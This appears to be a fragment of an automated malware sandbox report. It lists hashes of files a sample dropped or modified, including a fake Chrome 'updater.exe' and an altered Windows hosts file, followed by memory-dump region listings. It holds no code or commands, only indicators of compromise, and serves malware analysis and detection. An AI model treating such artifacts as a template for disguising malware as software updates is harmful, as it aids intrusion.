276f7effb5ec82d444aadcea8523916d6dcc76a63826bc24fa3f7ee2b2f5cc5d3994d7747aaa44b17c67d475dca41c90533e166d187e890a76bd144e0f8e0c02

Download Submit
C:\Program Files\Google\Libs\g.log
Filesize
198B

MD5
37dd19b2be4fa7635ad6a2f3238c4af1

SHA1
e5b2c034636b434faee84e82e3bce3a3d3561943

SHA256
8066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07

SHA512
86e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
0a07e4be67bec11b525795ea15cd0e80

SHA1
e62e2c165f3466e487babbfa9e2a16b583e9a84a

SHA256
65462903c650e37ba468b4b9d260f58b4b93c0fd98b3c525df22a58a96943af1

SHA512
aad1aabbe8586f20435e8dac3768fa42652ed6583267b2f04f5c786345b9c069bcb3d4060cabb08f9318141dd427acec00d91fef329479cf64be6644638e3690

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
0a07e4be67bec11b525795ea15cd0e80

SHA1
e62e2c165f3466e487babbfa9e2a16b583e9a84a

SHA256
65462903c650e37ba468b4b9d260f58b4b93c0fd98b3c525df22a58a96943af1

SHA512
aad1aabbe8586f20435e8dac3768fa42652ed6583267b2f04f5c786345b9c069bcb3d4060cabb08f9318141dd427acec00d91fef329479cf64be6644638e3690

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
2KB

MD5
4414f1125d1d6f86a7588f226996a8e6

SHA1
1bb04893c1e093f8ab7880144bf2d720bd56ca03

SHA256
3187ae368d15b7a1cfbb7b2c1338464ab40586b9432b6b4d259c67e0e9fe9d7e

SHA512
01f6158e1f562f63b0e5f17dfe8cd8ad8e8db8c41bca94dbb0dc551c68ba923aa5708c0c7f8ce39c287aaa5dd713ec74f347c10d9dec8eaab9ecd170fd6b9c80

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\Program Files\Google\Chrome\updater.exe
Filesize
7.0MB

MD5
0b1c9cde6b467847472545263c58791c

SHA1
3acaf0cefda3ab7e43c18a8eb17ec69477cc36a8

SHA256
394ccb1ddb7208fb72d9f0a277c13202f9f2843652287eaa7355d83d88170f14

SHA512
276f7effb5ec82d444aadcea8523916d6dcc76a63826bc24fa3f7ee2b2f5cc5d3994d7747aaa44b17c67d475dca41c90533e166d187e890a76bd144e0f8e0c02

Download Submit
memory/112-159-0x0000000000000000-mapping.dmp

Download
memory/276-94-0x0000000000000000-mapping.dmp

Download
memory/292-117-0x000000013F9E0000-0x000000014068B000-memory.dmp

Filesize
12.7MB

Download
memory/292-152-0x000000013F9E0000-0x000000014068B000-memory.dmp

Filesize
12.7MB

Download
memory/320-144-0x0000000000000000-mapping.dmp

Download
memory/332-145-0x0000000000000000-mapping.dmp

Download
memory/364-75-0x0000000000000000-mapping.dmp

Download
memory/572-84-0x0000000000000000-mapping.dmp

Download
memory/572-135-0x0000000000000000-mapping.dmp

Download
memory/584-86-0x0000000000000000-mapping.dmp

Download
memory/784-130-0x0000000000000000-mapping.dmp

Download
memory/832-131-0x0000000000000000-mapping.dmp

Download
memory/908-140-0x0000000000000000-mapping.dmp

Download
memory/996-69-0x0000000000000000-mapping.dmp

Download
memory/1092-83-0x0000000000000000-mapping.dmp

Download
memory/1104-139-0x000007FEF30F0000-0x000007FEF3C4D000-memory.dmp

Filesize
11.4MB

Download
memory/1104-148-0x0000000001314000-0x0000000001317000-memory.dmp

Filesize
12KB

Download
memory/1104-138-0x000007FEF3C50000-0x000007FEF4673000-memory.dmp

Filesize
10.1MB

Download
memory/1104-149-0x000000000131B000-0x000000000133A000-memory.dmp

Filesize
124KB

Download
memory/1104-133-0x0000000000000000-mapping.dmp

Download
memory/1108-134-0x0000000000000000-mapping.dmp

Download
memory/1140-88-0x0000000000000000-mapping.dmp

Download
memory/1148-141-0x0000000000000000-mapping.dmp

Download
memory/1164-72-0x0000000000000000-mapping.dmp

Download
memory/1252-156-0x0000000000000000-mapping.dmp

Download
memory/1252-70-0x0000000000000000-mapping.dmp

Download
memory/1260-67-0x0000000002934000-0x0000000002937000-memory.dmp

Filesize
12KB

Download
memory/1260-64-0x000007FEF3C50000-0x000007FEF4673000-memory.dmp

Filesize
10.1MB

Download
memory/1260-63-0x000007FEFB6A1000-0x000007FEFB6A3000-memory.dmp

Filesize
8KB

Download
memory/1260-62-0x0000000000000000-mapping.dmp

Download
memory/1260-66-0x0000000002934000-0x0000000002937000-memory.dmp

Filesize
12KB

Download
memory/1260-65-0x000007FEF30F0000-0x000007FEF3C4D000-memory.dmp

Filesize
11.4MB

Download
memory/1260-68-0x000000000293B000-0x000000000295A000-memory.dmp

Filesize
124KB

Download
memory/1316-82-0x00000000025F4000-0x00000000025F7000-memory.dmp

Filesize
12KB

Download
memory/1316-78-0x000007FEF2750000-0x000007FEF32AD000-memory.dmp

Filesize
11.4MB

Download
memory/1316-85-0x000000001B820000-0x000000001BB1F000-memory.dmp

Filesize
3.0MB

Download
memory/1316-95-0x00000000025FB000-0x000000000261A000-memory.dmp

Filesize
124KB

Download
memory/1316-97-0x00000000025FB000-0x000000000261A000-memory.dmp

Filesize
124KB

Download
memory/1316-96-0x00000000025F4000-0x00000000025F7000-memory.dmp

Filesize
12KB

Download
memory/1316-77-0x000007FEF32B0000-0x000007FEF3CD3000-memory.dmp

Filesize
10.1MB

Download
memory/1316-71-0x0000000000000000-mapping.dmp

Download
memory/1320-146-0x0000000000000000-mapping.dmp

Download
memory/1380-92-0x0000000000000000-mapping.dmp

Download
memory/1396-142-0x0000000000000000-mapping.dmp

Download
memory/1416-143-0x0000000000000000-mapping.dmp

Download
memory/1428-91-0x0000000000000000-mapping.dmp

Download
memory/1480-89-0x0000000000000000-mapping.dmp

Download
memory/1520-87-0x0000000000000000-mapping.dmp

Download
memory/1532-114-0x000000013F9E0000-0x000000014068B000-memory.dmp

Filesize
12.7MB

Download
memory/1532-112-0x0000000000000000-mapping.dmp

Download
memory/1532-115-0x000000013F9E0000-0x000000014068B000-memory.dmp

Filesize
12.7MB

Download
memory/1532-118-0x000000013F9E0000-0x000000014068B000-memory.dmp

Filesize
12.7MB

Download
memory/1532-165-0x0000000076E20000-0x0000000076FC9000-memory.dmp

Filesize
1.7MB

Download
memory/1532-116-0x000000013F9E0000-0x000000014068B000-memory.dmp

Filesize
12.7MB

Download
memory/1532-119-0x000000013F9E0000-0x000000014068B000-memory.dmp

Filesize
12.7MB

Download
memory/1532-120-0x000000013F9E0000-0x000000014068B000-memory.dmp

Filesize
12.7MB

Download
memory/1532-121-0x0000000076E20000-0x0000000076FC9000-memory.dmp

Filesize
1.7MB

Download
memory/1532-164-0x000000013F9E0000-0x000000014068B000-memory.dmp

Filesize
12.7MB

Download
memory/1532-154-0x0000000076E20000-0x0000000076FC9000-memory.dmp

Filesize
1.7MB

Download
memory/1532-153-0x000000013F9E0000-0x000000014068B000-memory.dmp

Filesize
12.7MB

Download
memory/1604-81-0x0000000076E20000-0x0000000076FC9000-memory.dmp

Filesize
1.7MB

Download
memory/1604-56-0x000000013F650000-0x00000001402FB000-memory.dmp

Filesize
12.7MB

Download
memory/1604-100-0x000000013F650000-0x00000001402FB000-memory.dmp

Filesize
12.7MB

Download
memory/1604-101-0x0000000076E20000-0x0000000076FC9000-memory.dmp

Filesize
1.7MB

Download
memory/1604-55-0x000000013F650000-0x00000001402FB000-memory.dmp

Filesize
12.7MB

Download
memory/1604-59-0x000000013F650000-0x00000001402FB000-memory.dmp

Filesize
12.7MB

Download
memory/1604-58-0x000000013F650000-0x00000001402FB000-memory.dmp

Filesize
12.7MB

Download
memory/1604-80-0x000000013F650000-0x00000001402FB000-memory.dmp

Filesize
12.7MB

Download
memory/1604-60-0x000000013F650000-0x00000001402FB000-memory.dmp

Filesize
12.7MB

Download
memory/1604-54-0x000000013F650000-0x00000001402FB000-memory.dmp

Filesize
12.7MB

Download
memory/1604-61-0x0000000076E20000-0x0000000076FC9000-memory.dmp

Filesize
1.7MB

Download
memory/1604-57-0x000000013F650000-0x00000001402FB000-memory.dmp

Filesize
12.7MB

Download
memory/1612-161-0x0000000000000000-mapping.dmp

Download
memory/1620-107-0x0000000000000000-mapping.dmp

Download
memory/1644-157-0x0000000000000000-mapping.dmp

Download
memory/1752-150-0x0000000000000000-mapping.dmp

Download
memory/1760-137-0x0000000000000000-mapping.dmp

Download
memory/1796-109-0x000000000247B000-0x000000000249A000-memory.dmp

Filesize
124KB

Download
memory/1796-110-0x000000000247B000-0x000000000249A000-memory.dmp

Filesize
124KB

Download
memory/1796-108-0x0000000002474000-0x0000000002477000-memory.dmp

Filesize
12KB

Download
memory/1796-106-0x000000001B7A0000-0x000000001BA9F000-memory.dmp

Filesize
3.0MB

Download
memory/1796-105-0x000007FEF30F0000-0x000007FEF3C4D000-memory.dmp

Filesize
11.4MB

Download
memory/1796-98-0x0000000000000000-mapping.dmp

Download
memory/1796-104-0x000007FEF3C50000-0x000007FEF4673000-memory.dmp

Filesize
10.1MB

Download
memory/1804-76-0x0000000000000000-mapping.dmp

Download
memory/1824-90-0x0000000000000000-mapping.dmp

Download
memory/1888-158-0x0000000000000000-mapping.dmp

Download
memory/1932-147-0x0000000000000000-mapping.dmp

Download
memory/1952-79-0x0000000000000000-mapping.dmp

Download
memory/1972-93-0x0000000000000000-mapping.dmp

Download
memory/1976-151-0x0000000000000000-mapping.dmp

Download
memory/2012-155-0x00000001400014E0-mapping.dmp

Download
memory/2040-122-0x0000000000000000-mapping.dmp

Download
memory/2040-127-0x00000000011B4000-0x00000000011B7000-memory.dmp

Filesize
12KB

Download
memory/2040-125-0x000007FEF32B0000-0x000007FEF3CD3000-memory.dmp

Filesize
10.1MB

Download
memory/2040-126-0x000007FEF2750000-0x000007FEF32AD000-memory.dmp

Filesize
11.4MB

Download
memory/2040-129-0x00000000011BB000-0x00000000011DA000-memory.dmp

Filesize
124KB

Download
memory/2040-128-0x00000000011B4000-0x00000000011B7000-memory.dmp

Filesize
12KB

Download
memory/2044-163-0x00000001407F25D0-mapping.dmp

Download
memory/2044-166-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/2044-167-0x00000000000F0000-0x0000000000110000-memory.dmp

Filesize
128KB

Download
memory/2044-168-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download